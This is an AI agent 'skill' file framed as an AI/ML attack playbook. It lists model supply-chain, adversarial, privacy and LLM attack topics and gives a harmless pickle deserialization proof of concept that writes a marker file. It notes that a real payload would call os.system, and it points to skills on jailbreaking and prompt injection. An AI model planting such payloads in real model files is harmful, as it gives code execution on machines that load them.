SKILL: AI/ML Security — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.
0. RELATED ROUTING
- llm-prompt-injection for LLM-specific prompt injection, jailbreaking, and tool abuse techniques
- deserialization-insecure for deeper coverage of Python pickle and general deserialization attack patterns
- dependency-confusion when the ML pipeline has supply chain risks via pip/npm package confusion
1. MODEL SUPPLY CHAIN ATTACKS
1.1 Malicious Model Files — Pickle RCE
Python's pickle module can execute arbitrary code during deserialization: any object's __reduce__ may return a callable that the unpickler invokes. PyTorch .pt/.pth files are pickle-based by default (torch.save wraps pickled objects in a zip archive), so torch.load on an untrusted model runs attacker-controlled code unless weights_only=True is in effect (the default only in recent PyTorch releases).
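A minimal, harmless sketch of the primitive: __reduce__ returns a callable plus arguments, and the unpickler calls it during load. The marker path is a hypothetical stand-in; a real payload would return something like (os.system, ("<shell command>",)) instead of a file-creating callable.

```python
import os
import pickle
import tempfile

# Hypothetical marker path, used only to prove code ran at load time.
marker = os.path.join(tempfile.gettempdir(), "pickle_rce_demo.txt")

class Payload:
    """Stand-in for a 'model' object embedded in a .pt/.pth file."""
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild the object: return any
        # callable plus its arguments, and the unpickler calls it.
        # A real payload would return (os.system, ("<shell command>",));
        # here the callable harmlessly creates a marker file.
        return (open, (marker, "w"))

blob = pickle.dumps(Payload())   # attacker ships this blob as "model.pt"
result = pickle.loads(blob)      # victim "loads the model" -> callable runs
result.close()
print(os.path.exists(marker))    # True: code executed before any inference
```

Note the payload fires inside pickle.loads itself, so the victim never has to call or even inspect the "model" for the code to run.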